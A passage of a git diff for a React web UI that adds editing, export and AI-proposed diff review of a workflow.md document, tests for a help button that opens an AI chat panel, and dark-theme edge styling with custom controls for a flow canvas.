+        setWorkflowMdDiff(initialCreateDraft.workflowMdDiff ?? null);
+        setEditDocMode(initialCreateDraft.editDocMode ?? 'edit');
+        setEditDocError(null);
+        if (restoredDraft.trim()) {
+          setCanvasTab(isValidCanvasTab(initialCreateDraft.canvasTab) ? initialCreateDraft.canvasTab : 'md');
+        }
+        return;
+      }
+
+      setWorkflowMdDraft(next);
+      setWorkflowMdBase(next);
+      setWorkflowMdDiff(next.trim() ? { before: '', after: next } : null);
+      setEditDocMode('edit');
+      setEditDocError(null);
+      if (next.trim()) {
+        setCanvasTab('md');
+      }
+      return;
+    }
+
+    if (next !== workflowMdBase && next !== workflowMdDraft) {
+      setWorkflowMdDraft(next);
+      setWorkflowMdBase(next);
+      setWorkflowMdDiff({ before: workflowMdBase, after: next });
+      setEditDocMode('edit');
+      setEditDocError(null);
+      setCanvasTab('md');
+    }
+  }, [workflow, workflowMdBase, workflowMdDraft]);
+
+  const editDocDirty = workflowMdDraft !== workflowMdBase;
+  const workflowMdDiffLines = useMemo(() => (
+    workflowMdDiff ? buildLineDiff(workflowMdDiff.before, workflowMdDiff.after) : []
+  ), [workflowMdDiff]);
+  const workflowMdDiffStats = useMemo(() => ({
+    added: workflowMdDiffLines.filter((line) => line.type === 'add').length,
+    removed: workflowMdDiffLines.filter((line) => line.type === 'remove').length,
+  }), [workflowMdDiffLines]);
+  const workflowMdDiffHunks = useMemo(() => (
+    workflowMdDiff ? buildTextDiffHunks(workflowMdDiff.before, workflowMdDiff.after) : []
+  ), [workflowMdDiff]);
+
+  const persistWorkflowMarkdown = useCallback(async (content: string) => {
+    if (!workflow) return content;
+    const normalized = content ? (content.endsWith('\n') ? content : `${content}\n`) : '';
+    const response = await workflowAPI.update(workflow.id, {
+      markdownContent: normalized,
+    });
+    const updated = {
+      ...response.data,
+      markdownContent: response.data.markdownContent ?? normalized,
+      editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? normalized,
+    };
+    setWorkflow(updated);
+    return updated.markdownContent ?? normalized;
+  }, [workflow]);
+
+  const handleExportEditDoc = useCallback(() => {
+    if (!workflowMdDraft.trim()) return;
+    const blob = new Blob([workflowMdDraft], { type: 'text/markdown' });
+    const url = URL.createObjectURL(blob);
+    const a = document.createElement('a');
+    a.href = url;
+    a.download = `${workflow?.id || 'workflow'}.md`;
+    a.click();
+    URL.revokeObjectURL(url);
+  }, [workflow?.id, workflowMdDraft]);
+
+  const handleSaveEditDoc = useCallback(async () => {
+    if (!workflow || editDocSaving) return;
+    setEditDocSaving(true);
+    setEditDocError(null);
+    try {
+      const saved = await persistWorkflowMarkdown(workflowMdDraft);
+      setWorkflowMdDraft(saved);
+      setWorkflowMdBase(saved);
+      setWorkflowMdDiff(null);
+      setEditDocMode('preview');
+    } catch (err: unknown) {
+      setEditDocError(extractErrorMessage(err));
+    } finally {
+      setEditDocSaving(false);
+    }
+  }, [editDocSaving, persistWorkflowMarkdown, workflow, workflowMdDraft]);
+
+  const buildEditDocGenerationPrompt = useCallback(() => {
+    if (workflow) {
+      const workflowDir = workflow.source === 'global'
+        ? `~/.flocks/plugins/workflows/${workflow.id}/`
+        : `.flocks/plugins/workflows/${workflow.id}/`;
+
+      return t('detail.generateEditDocPrompt', {
+        name: workflow.name,
+        dir: workflowDir,
+        mdPath: `${workflowDir}workflow.md`,
+        jsonPath: `${workflowDir}workflow.json`,
+        workflowJson: JSON.stringify(workflow.workflowJson, null, 2),
+      });
+    }
+
+    return t('create.chat.generateEditDocPrompt', {
+      editDocContent: workflowMdDraft,
+    });
+  }, [t, workflow, workflowMdDraft]);
+
+  const launchEditDocGeneration = useCallback(() => {
+    setPanelOpen(true);
+    setCanvasTab('md');
+    setEditDocMode('edit');
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildEditDocGenerationPrompt(),
+      displayLabel: t('detail.generateEditDoc'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildEditDocGenerationPrompt, t]);
+
+  const handleGenerateEditDoc = useCallback(() => {
+    if (!workflowMdDraft.trim() || !workflow) {
+      launchEditDocGeneration();
+      return;
+    }
+
+    const next = buildWorkflowMarkdown(workflow);
+    setWorkflowMdDraft(next);
+    setWorkflowMdDiff(null);
+    setEditDocMode('edit');
+    setEditDocError(null);
+  }, [launchEditDocGeneration, workflow, workflowMdDraft]);
+
+  const buildWorkflowGenerationPrompt = useCallback((editDocContent: string) => {
+    if (workflow) {
+      const workflowDir = workflow.source === 'global'
+        ? `~/.flocks/plugins/workflows/${workflow.id}/`
+        : `.flocks/plugins/workflows/${workflow.id}/`;
+
+      return t('detail.generateWorkflowPrompt', {
+        name: workflow.name,
+        dir: workflowDir,
+        mdPath: `${workflowDir}workflow.md`,
+        jsonPath: `${workflowDir}workflow.json`,
+        editDocContent,
+      });
+    }
+
+    return t('create.chat.generateWorkflowPrompt', {
+      editDocContent,
+    });
+  }, [t, workflow]);
+
+  const handleGenerateWorkflow = useCallback(() => {
+    const content = workflowMdDraft.trim() ? workflowMdDraft : '';
+    if (!content) return;
+
+    setPanelOpen(true);
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildWorkflowGenerationPrompt(content),
+      displayLabel: t('detail.generateWorkflow'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildWorkflowGenerationPrompt, t, workflowMdDraft]);
+
+  useEffect(() => {
+    if (!workflow || workflowMdDraft.trim() || !hasWorkflowJsonDefinition(workflow)) return;
+    if (missingMarkdownAutoLaunchRef.current === workflow.id) return;
+    missingMarkdownAutoLaunchRef.current = workflow.id;
+    launchEditDocGeneration();
+  }, [launchEditDocGeneration, workflow, workflowMdDraft]);
+
+  const handleChatLaunchRequestHandled = useCallback((requestId: number) => {
+    setChatLaunchRequest((current) => (
+      current?.id === requestId ? null : current
+    ));
+  }, []);
+
+  const handleAcceptEditDocDiff = useCallback(() => {
+    setWorkflowMdDiff(null);
+    setEditDocError(null);
+  }, []);
+
+  const handleAcceptEditDocDiffHunk = useCallback((hunk: TextDiffHunk) => {
+    if (!workflowMdDiff) return;
+    const nextBefore = acceptTextDiffHunk(workflowMdDiff.before, hunk);
+    if (nextBefore === workflowMdDiff.after) {
+      setWorkflowMdDiff(null);
+    } else {
+      setWorkflowMdDiff({
+        before: nextBefore,
+        after: workflowMdDiff.after,
+      });
+    }
+    setEditDocError(null);
+  }, [workflowMdDiff]);
+
+  const handleRejectEditDocDiff = useCallback(async () => {
+    if (!workflowMdDiff || editDocReviewing) return;
+    const content = workflowMdDiff.before;
+    setEditDocReviewing('reject');
+    setEditDocError(null);
+    try {
+      const saved = workflow ? await persistWorkflowMarkdown(content) : content;
+      setWorkflowMdDraft(saved);
+      setWorkflowMdBase(saved);
+      setWorkflowMdDiff(null);
+      setEditDocMode('edit');
+    } catch (err: unknown) {
+      setEditDocError(extractErrorMessage(err));
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocReviewing, persistWorkflowMarkdown, workflow, workflowMdDiff]);
+
+  const handleRejectEditDocDiffHunk = useCallback(async (hunk: TextDiffHunk) => {
+    if (!workflowMdDiff || editDocReviewing) return;
+    const content = rejectTextDiffHunk(workflowMdDiff.after, hunk);
+    setEditDocReviewing(`reject:${hunk.id}`);
+    setEditDocError(null);
+    try {
+      const saved = workflow ? await persistWorkflowMarkdown(content) : content;
+      setWorkflowMdDraft(saved);
+      setWorkflowMdBase(saved);
+      if (saved === workflowMdDiff.before) {
+        setWorkflowMdDiff(null);
+      } else {
+        setWorkflowMdDiff({
+          before: workflowMdDiff.before,
+          after: saved,
+        });
+      }
+      setEditDocMode('edit');
+    } catch (err: unknown) {
+      setEditDocError(extractErrorMessage(err));
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocReviewing, persistWorkflowMarkdown, workflow, workflowMdDiff]);
+
   return (
     <div className="flex flex-col h-full bg-gray-50 overflow-hidden">
       <CreateTopBar
@@ -78,29 +549,101 @@ export default function WorkflowCreate() {
         onTogglePanel={() => setPanelOpen((v) => !v)}
       />
 
-      <div className="flex flex-1 min-h-0 overflow-hidden">
-        {/* 左侧画布 */}
-        <div className="flex-1 min-w-0 relative">
-          <FlowCanvas
-            workflowJson={workflow?.workflowJson ?? EMPTY_WORKFLOW_JSON}
-            editable={false}
-          />
-          {/* 空状态遮罩 */}
-          {!workflow && (
-            <div className="absolute inset-0 flex flex-col items-center justify-center gap-4 pointer-events-none">
-              <div className="flex flex-col items-center gap-3 bg-white/90 backdrop-blur-sm rounded-2xl border border-dashed border-gray-300 px-10 py-8 shadow-sm">
-                <div className="flex items-center justify-center w-14 h-14 rounded-xl bg-gray-50 border border-gray-200">
-                  <WorkflowIcon className="w-7 h-7 text-gray-300" />
-                </div>
-                <div className="text-center">
-                  <p className="text-sm font-medium text-gray-500">{t('create.canvasTitle')}</p>
-                  <p className="text-xs text-gray-400 mt-1 max-w-[200px] leading-relaxed">
-                    {t('create.canvasHint')}
-                  </p>
+      <div className="relative isolate flex flex-1 min-h-0 overflow-hidden">
+        {/* 左侧编辑/预览区 */}
+        <div className="relative z-0 flex flex-1 min-w-0 flex-col overflow-hidden">
+          <div className="flex flex-shrink-0 items-center border-b border-gray-200 bg-white px-2">
+            {CANVAS_TABS.map((tab) => (
+              <button
+                key={tab.id}
+                type="button"
+                onClick={() => setCanvasTab(tab.id)}
+                className={`relative flex items-center gap-1.5 px-3 py-2.5 text-xs font-medium transition-colors ${
+                  canvasTab === tab.id
+                    ? 'text-red-600'
+                    : 'text-gray-500 hover:text-gray-700'
+                }`}
+              >
+                {tab.icon}
+                {tab.label}
+                {canvasTab === tab.id && (
+                  <span className="absolute bottom-0 left-0 right-0 h-0.5 rounded-full bg-red-600" />
+                )}
+              </button>
+            ))}
+          </div>
+
+          <div className="relative min-h-0 flex-1">
+            <div className={canvasTab === 'flow' ? 'absolute inset-0' : 'hidden'}>
+              <FlowCanvas
+                workflowJson={workflow?.workflowJson ?? EMPTY_WORKFLOW_JSON}
+                editable={false}
+              />
+              {!workflow && (
+                <div className="pointer-events-none absolute inset-0 flex flex-col items-center justify-center gap-4">
+                  <div className="flex flex-col items-center gap-3 rounded-2xl border border-dashed border-gray-300 bg-white/90 px-10 py-8 shadow-sm backdrop-blur-sm">
+                    <div className="flex h-14 w-14 items-center justify-center rounded-xl border border-gray-200 bg-gray-50">
+                      <WorkflowIcon className="h-7 w-7 text-gray-300" />
+                    </div>
+                    <div className="text-center">
+                      <p className="text-sm font-medium text-gray-500">{t('create.canvasTitle')}</p>
+                      <p className="mt-1 max-w-[200px] text-xs leading-relaxed text-gray-400">
+                        {t('create.canvasHint')}
+                      </p>
+                    </div>
+                  </div>
                 </div>
-              </div>
+              )}
             </div>
-          )}
+
+            {canvasTab === 'md' && (
+              <WorkflowDocumentPanel
+                editorId="workflow-create-edit-doc"
+                mode={editDocMode}
+                value={workflowMdDraft}
+                dirty={editDocDirty}
+                saving={editDocSaving}
+                error={editDocError}
+                resetDisabled={false}
+                saveDisabled={!workflow || !editDocDirty || editDocSaving}
+                generateWorkflowDisabled={!workflowMdDraft.trim()}
+                onModeChange={setEditDocMode}
+                onChange={(value) => {
+                  setWorkflowMdDraft(value);
+                  setWorkflowMdDiff(null);
+                  setEditDocError(null);
+                }}
+                onResetDocument={handleGenerateEditDoc}
+                onSave={() => void handleSaveEditDoc()}
+                onGenerateWorkflow={handleGenerateWorkflow}
+                onDownload={handleExportEditDoc}
+                diffReview={
+                  workflowMdDiff ? (
+                    <WorkflowMarkdownDiffReview
+                      lines={workflowMdDiffLines}
+                      hunks={workflowMdDiffHunks}
+                      added={workflowMdDiffStats.added}
+                      removed={workflowMdDiffStats.removed}
+                      reviewingId={editDocReviewing}
+                      disabled={editDocSaving || editDocReviewing !== null}
+                      onAccept={handleAcceptEditDocDiff}
+                      onReject={() => void handleRejectEditDocDiff()}
+                      onAcceptHunk={handleAcceptEditDocDiffHunk}
+                      onRejectHunk={(hunk) => void handleRejectEditDocDiffHunk(hunk)}
+                    />
+                  ) : undefined
+                }
+              />
+            )}
+
+            {canvasTab === 'json' && (
+              <div className="absolute inset-0 overflow-y-auto bg-gray-900 p-4">
+                <pre className="font-mono text-xs leading-relaxed text-gray-200 whitespace-pre">
+                  {workflow ? JSON.stringify(workflow.workflowJson, null, 2) : ''}
+                </pre>
+              </div>
+            )}
+          </div>
         </div>
 
         {/* 拖动分隔条 */}
@@ -120,6 +663,12 @@ export default function WorkflowCreate() {
           open={panelOpen}
           width={panelWidth}
           onWorkflowCreated={handleWorkflowCreated}
+          onWorkflowUpdated={handleWorkflowUpdated}
+          initialChatSessionId={chatSessionId}
+          creationStartedAt={creationStartedAt}
+          onChatSessionChange={setChatSessionId}
+          chatLaunchRequest={chatLaunchRequest}
+          onChatLaunchRequestHandled={handleChatLaunchRequestHandled}
         />
       </div>
     </div>
diff --git a/webui/src/pages/WorkflowDetail/FlocksHelpButton.test.tsx b/webui/src/pages/WorkflowDetail/FlocksHelpButton.test.tsx
new file mode 100644
index 000000000..c7366cdc5
--- /dev/null
+++ b/webui/src/pages/WorkflowDetail/FlocksHelpButton.test.tsx
@@ -0,0 +1,367 @@
+import { fireEvent, render, screen, waitFor, within } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { MemoryRouter, Route, Routes } from 'react-router-dom';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import { ConfirmProvider } from '@/components/common/ConfirmDialog';
+import WorkflowDetail from './index';
+
+const {
+  mockGetWorkflow,
+  mockUpdateWorkflow,
+  mockSendSessionMessage,
+  originalMarkdown,
+  twoHunkMarkdown,
+  topOnlyMarkdown,
+} = vi.hoisted(() => ({
+  mockGetWorkflow: vi.fn(),
+  mockUpdateWorkflow: vi.fn(),
+  mockSendSessionMessage: vi.fn(),
+  originalMarkdown: '# old\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast\n',
+  twoHunkMarkdown: '# new\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast changed\n',
+  topOnlyMarkdown: '# new\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast\n',
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: {
+    get: mockGetWorkflow,
+    update: mockUpdateWorkflow,
+    delete: vi.fn(),
+    export: vi.fn(),
+  },
+}));
+
+vi.mock('@/api/session', () => ({
+  sessionApi: {
+    sendMessage: mockSendSessionMessage,
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string) => {
+      const translations: Record<string, string> = {
+        'detail.flocksHelp': '让Rex帮你配置、编辑工作流',
+        'detail.flocksHelpTitle': '让Rex帮你配置、编辑工作流',
+        'detail.resetLayout': '重置布局',
+        'detail.canvasTabs.flow': '流程图',
+        'detail.canvasTabs.md': '流程说明',
+        'detail.canvasTabs.json': '工作流文件',
+        'detail.editDocTitle': 'workflow.md',
+        'detail.editDocModeEdit': '编辑',
+        'detail.editDocModePreview': '预览',
+        'detail.editDocDiffTitle': 'AI 修改差异',
+        'detail.editDocDiffReviewDesc': '接受会保留当前内容；拒绝会回滚到修改前内容。',
+        'detail.editDocDiffHunkTitle': '变更 {{index}}',
+        'detail.editDocDiffAdded': '新增',
+        'detail.editDocDiffRemoved': '删除',
+        'detail.editDocDiffAccept': '接受',
+        'detail.editDocDiffReject': '拒绝',
+        'detail.editDocDiffAcceptHunk': '接受此段',
+        'detail.editDocDiffRejectHunk': '拒绝此段',
+        'detail.editDocDiffRejecting': '回滚中',
+        'detail.editDocDiffAcceptHunkSuccess': '已接受此段',
+        'detail.editDocDiffRejectHunkSuccess': '已拒绝此段',
+        'detail.editDocDiffRejectSuccess': '已拒绝',
+        'detail.editDocDiffRejectFailed': '拒绝失败',
+        'detail.editDocDiffRejectHunkFailed': '拒绝此段失败',
+        'detail.editDocTextareaLabel': '编辑 workflow.md',
+        'detail.editDocPlaceholder': '在这里编辑 workflow.md...',
+        'detail.downloadMd': '下载说明文件',
+        'detail.downloadMdTitle': '下载当前说明文件',
+        'detail.generateEditDocTitle': '生成说明',
+        'detail.regenerateEditDocTitle': '重置 workflow.md',
+        'detail.regenerateEditDoc': '重置文档',
+        'detail.generateEditDoc': '生成说明',
+        'detail.editDocSave': '保存',
+        'detail.editDocSaving': '保存中',
+        'detail.generateWorkflow': '生成工作流',
+        'detail.generateWorkflowTitle': '基于 workflow.md 生成 workflow.json',
+        'detail.generateEditDocPrompt': '用户点击了「生成说明」。基于 {{jsonPath}} 生成 workflow.md。\n{{workflowJson}}',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+vi.mock('./TopBar', () => ({
+  default: ({ onTogglePanel }: { onTogglePanel: () => void }) => (
+    <button type="button" onClick={onTogglePanel}>toggle panel</button>
+  ),
+}));
+
+vi.mock('./FlowCanvas', () => ({
+  default: () => <div data-testid="flow-canvas">flow canvas</div>,
+}));
+
+vi.mock('./RightPanel', () => ({
+  default: ({
+    open,
+    activeTab,
+    workflow,
+    onWorkflowUpdated,
+    onSessionChange,
+    chatLaunchRequest,
+  }: {
+    open: boolean;
+    activeTab?: string;
+    workflow: ReturnType<typeof makeWorkflow>;
+    onWorkflowUpdated?: (workflow: ReturnType<typeof makeWorkflow>) => void;
+    onSessionChange?: (sessionId: string | null) => void;
+    chatLaunchRequest?: { prompt: string; displayLabel?: string } | null;
+  }) => (
+    <div
+      data-testid="right-panel"
+      data-open={open ? 'open' : 'closed'}
+      data-active-tab={activeTab}
+      data-launch-label={chatLaunchRequest?.displayLabel ?? ''}
+    >
+      right panel
+      <button
+        type="button"
+        onClick={() => onSessionChange?.('session-1')}
+      >
+        attach workflow chat session
+      </button>
+      <button
+        type="button"
+        onClick={() => onWorkflowUpdated?.({
+          ...workflow,
+          updatedAt: workflow.updatedAt + 1,
+          markdownContent: twoHunkMarkdown,
+          editMarkdownContent: twoHunkMarkdown,
+        })}
+      >
+        simulate AI markdown update
+      </button>
+      <button
+        type="button"
+        onClick={() => onWorkflowUpdated?.({
+          ...workflow,
+          updatedAt: workflow.updatedAt + 1,
+          markdownContent: topOnlyMarkdown,
+          editMarkdownContent: topOnlyMarkdown,
+        })}
+      >
+        simulate top-only markdown update
+      </button>
+    </div>
+  ),
+}));
+
+vi.mock('./NodeInfoPanel', () => ({
+  default: () => <div>node info</div>,
+}));
+
+function makeWorkflow() {
+  return {
+    id: 'wf-1',
+    name: '测试工作流',
+    category: 'default',
+    status: 'draft' as const,
+    createdAt: 0,
+    updatedAt: 0,
+    stats: {
+      callCount: 0,
+      successCount: 0,
+      errorCount: 0,
+      totalRuntime: 0,
+      avgRuntime: 0,
+      thumbsUp: 0,
+      thumbsDown: 0,
+    },
+    workflowJson: {
+      start: 'node-1',
+      nodes: [{ id: 'node-1', type: 'python' as const }],
+      edges: [],
+    },
+    markdownContent: originalMarkdown,
+    editMarkdownContent: originalMarkdown,
+  };
+}
+
+function renderDetail() {
+  return render(
+    <MemoryRouter initialEntries={['/workflows/wf-1']}>
+      <ConfirmProvider>
+        <Routes>
+          <Route path="/workflows/:id" element={<WorkflowDetail />} />
+        </Routes>
+      </ConfirmProvider>
+    </MemoryRouter>,
+  );
+}
+
+describe('Flocks help button', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    mockGetWorkflow.mockResolvedValue({ data: makeWorkflow() });
+    mockUpdateWorkflow.mockImplementation(async (_workflowId: string, payload: { markdownContent?: string }) => ({
+      data: {
+        ...makeWorkflow(),
+        markdownContent: payload.markdownContent ?? '',
+        editMarkdownContent: payload.markdownContent ?? '',
+      },
+    }));
+    mockSendSessionMessage.mockResolvedValue({});
+  });
+
+  it('opens the right panel on the AI edit tab', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'toggle panel' }));
+
+    await waitFor(() => {
+      expect(screen.getByTestId('right-panel')).toHaveAttribute('data-open', 'closed');
+    });
+
+    await user.click(screen.getByRole('button', { name: '让Rex帮你配置、编辑工作流' }));
+
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-open', 'open');
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-active-tab', 'chat');
+  });
+
+  it('uses an instruction label when launching workflow regeneration from the editor', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: '流程说明' }));
+    await user.click(screen.getByRole('button', { name: '生成工作流' }));
+
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-active-tab', 'chat');
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-launch-label', '生成工作流');
+  });
+
+  it('launches workflow.md generation first when entering the workbench without a markdown document', async () => {
+    const user = userEvent.setup();
+    mockGetWorkflow.mockResolvedValue({
+      data: {
+        ...makeWorkflow(),
+        markdownContent: undefined,
+        editMarkdownContent: undefined,
+      },
+    });
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: '让Rex帮你配置、编辑工作流' }));
+
+    await waitFor(() => {
+      expect(screen.getByTestId('right-panel')).toHaveAttribute('data-active-tab', 'chat');
+      expect(screen.getByTestId('right-panel')).toHaveAttribute('data-launch-label', '生成说明');
+    });
+  });
+
+  it('shows AI markdown diff inline above the editor and can reject it', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'simulate AI markdown update' }));
+
+    expect(await screen.findByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: 'Diff' })).not.toBeInTheDocument();
+    expect(screen.getByTestId('workflow-md-diff-review')).toBeInTheDocument();
+    expect(screen.queryByRole('textbox', { name: '编辑 workflow.md' })).not.toBeInTheDocument();
+    expect(screen.getByText('keep 3')).toBeInTheDocument();
+
+    expect(screen.getAllByRole('button', { name: '接受此段' })).toHaveLength(2);
+    expect(screen.getAllByRole('button', { name: '拒绝此段' })).toHaveLength(2);
+
+    await user.click(screen.getAllByRole('button', { name: '拒绝此段' })[0]);
+
+    await waitFor(() => {
+      expect(mockUpdateWorkflow).toHaveBeenCalledWith('wf-1', {
+        markdownContent: '# old\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast changed\n',
+      });
+    });
+    expect(screen.getByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.getAllByRole('button', { name: '拒绝此段' })).toHaveLength(1);
+  });
+
+  it('shows synchronized line numbers while editing workflow.md', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: '流程说明' }));
+    await user.click(screen.getByRole('button', { name: '编辑' }));
+
+    const lineNumbers = within(screen.getByTestId('workflow-md-line-numbers'));
+    expect(lineNumbers.getByText('1')).toBeInTheDocument();
+    expect(lineNumbers.getByText('8')).toBeInTheDocument();
+
+    const editor = screen.getByRole('textbox', { name: '编辑 workflow.md' });
+    fireEvent.change(editor, { target: { value: 'first\nsecond\nthird' } });
+
+    await waitFor(() => {
+      expect(within(screen.getByTestId('workflow-md-line-numbers')).getByText('3')).toBeInTheDocument();
+    });
+    expect(editor).toHaveValue('first\nsecond\nthird');
+  });
+
+  it('shows unchanged markdown lines outside a single diff hunk', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'simulate top-only markdown update' }));
+
+    expect(await screen.findByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.getAllByRole('button', { name: '接受此段' })).toHaveLength(1);
+    expect(screen.getByText('keep 3')).toBeInTheDocument();
+    expect(screen.getByText('keep 4')).toBeInTheDocument();
+    expect(screen.getByText('last')).toBeInTheDocument();
+  });
+
+  it('persists an accepted markdown diff review result into the workflow chat session', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'attach workflow chat session' }));
+    await user.click(screen.getByRole('button', { name: 'simulate top-only markdown update' }));
+    await screen.findByText('AI 修改差异');
+    await user.click(screen.getByRole('button', { name: '接受' }));
+
+    await waitFor(() => {
+      expect(mockSendSessionMessage).toHaveBeenCalledWith('session-1', {
+        parts: [{
+          type: 'text',
+          text: expect.stringContaining('decision: accepted'),
+        }],
+        noReply: true,
+      });
+    });
+    const payload = mockSendSessionMessage.mock.calls[0][1].parts[0].text;
+    expect(payload).toContain('proposed_change_applied: true');
+    expect(payload).toContain('review_state: completed');
+  });
+
+  it('persists a rejected markdown diff review result into the workflow chat session', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'attach workflow chat session' }));
+    await user.click(screen.getByRole('button', { name: 'simulate top-only markdown update' }));
+    await screen.findByText('AI 修改差异');
+    await user.click(screen.getByRole('button', { name: '拒绝' }));
+
+    await waitFor(() => {
+      expect(mockSendSessionMessage).toHaveBeenCalledWith('session-1', {
+        parts: [{
+          type: 'text',
+          text: expect.stringContaining('decision: rejected'),
+        }],
+        noReply: true,
+      });
+    });
+    const payload = mockSendSessionMessage.mock.calls[0][1].parts[0].text;
+    expect(payload).toContain('proposed_change_applied: false');
+    expect(payload).toContain('workflow.md was restored to the previous content');
+  });
+});
diff --git a/webui/src/pages/WorkflowDetail/FlowCanvas.tsx b/webui/src/pages/WorkflowDetail/FlowCanvas.tsx
index c7803149e..e2053b563 100644
--- a/webui/src/pages/WorkflowDetail/FlowCanvas.tsx
+++ b/webui/src/pages/WorkflowDetail/FlowCanvas.tsx
@@ -1,10 +1,9 @@
-import { useState, useCallback, useEffect, memo } from 'react';
+import { useState, useCallback, useContext, useEffect, useMemo, useRef, memo, type ReactNode } from 'react';
 import { useTranslation } from 'react-i18next';
 import {
   ReactFlow,
   Node,
   Edge,
-  Controls,
   Background,
   BackgroundVariant,
   MiniMap,
@@ -18,8 +17,9 @@ import {
   NodeProps,
 } from '@xyflow/react';
 import '@xyflow/react/dist/style.css';
-import { Code2, Zap, GitBranch, RotateCw, X, ChevronRight, Wrench, Sparkles, Globe, Workflow } from 'lucide-react';
+import { Code2, Zap, GitBranch, RotateCw, RotateCcw, X, ChevronRight, ChevronUp, ChevronDown, Wrench, Sparkles, Globe, Workflow, ZoomIn, ZoomOut, Scan } from 'lucide-react';
 import { WorkflowJSON, WorkflowNode as APINode } from '@/api/workflow';
+import { ThemeContext } from '@/contexts/ThemeContext';
 import {
   buildWorkflowGraphLayout,
   WORKFLOW_GRAPH_NODE_WIDTH,
@@ -472,13 +472,15 @@ function NodeDetailModal({ node, isStart, onClose }: NodeDetailModalProps) {
 // Layout builder
 // ─────────────────────────────────────────────
 
-const EDGE_THEME: Record<WorkflowGraphEdgeRoute['kind'], {
+type FlowEdgeTheme = Record<WorkflowGraphEdgeRoute['kind'], {
   stroke: string;
   label: string;
   labelBg: string;
   strokeWidth: number;
   strokeDasharray?: string;
-}> = {
+}>;
+
+const LIGHT_EDGE_THEME: FlowEdgeTheme = {
   default: {
     stroke: '#94a3b8',
     label: '#64748b',
@@ -506,9 +508,38 @@ const EDGE_THEME: Record<WorkflowGraphEdgeRoute['kind'], {
   },
 };
 
+const DARK_EDGE_THEME: FlowEdgeTheme = {
+  default: {
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.7,
+  },
+  branch: {
+    stroke: '#f59e0b',
+    label: '#fbbf24',
+    labelBg: '#3d3424',
+    strokeWidth: 2.2,
+  },
+  loop: {
+    stroke: '#a78bfa',
+    label: '#c4b5fd',
+    labelBg: '#363047',
+    strokeWidth: 2,
+  },
+  back: {
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.8,
+    strokeDasharray: '6 5',
+  },
+};
+
 function buildLayout(
   workflowJson: WorkflowJSON,
-  onNodeClick: (nodeId: string) => void
+  onNodeClick: (nodeId: string) => void,
+  edgeTheme: FlowEdgeTheme
 ): { nodes: Node[]; edges: Edge[] } {
   const diagram = buildWorkflowGraphLayout(workflowJson);
   const startId = workflowJson.start || workflowJson.nodes[0]?.id;
@@ -535,7 +566,7 @@ function buildLayout(
   const edges: Edge[] = workflowJson.edges.map((edge, idx) => {
     const id = workflowGraphEdgeId(edge, idx);
     const route = diagram.edgeRoutes[id] ?? { kind: 'default' as const };
-    const theme = EDGE_THEME[route.kind];
+    const theme = edgeTheme[route.kind];
 
     return {
       id,
@@ -597,7 +628,7 @@ function buildLayout(
           type: 'smoothstep',
           animated: Boolean(trigger.enabled),
           markerEnd: { type: MarkerType.ArrowClosed, width: 16, height: 16 },
-          style: { stroke: '#7dd3fc', strokeWidth: 1.5, strokeDasharray: '5 4' },
+          style: { stroke: edgeTheme.branch.stroke, strokeWidth: 1.5, strokeDasharray: '5 4' },
         });
       }
     });
@@ -610,6 +641,30 @@ function buildLayout(
 // Main component
 // ─────────────────────────────────────────────
 
+function CanvasControlButton({
+  label,
+  onClick,
+  children,
+}: {
+  label: string;
+  onClick: () => void;
+  children: ReactNode;
+}) {
+  return (
+    <button
+      type="button"
+      onClick={onClick}
+      aria-label={label}
+      className="group relative flex h-8 w-full items-center justify-center text-slate-500 transition-colors hover:bg-slate-50 hover:text-slate-700 focus:outline-none focus:ring-2 focus:ring-red-100 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50 dark:focus:ring-zinc-700"
+    >
+      {children}
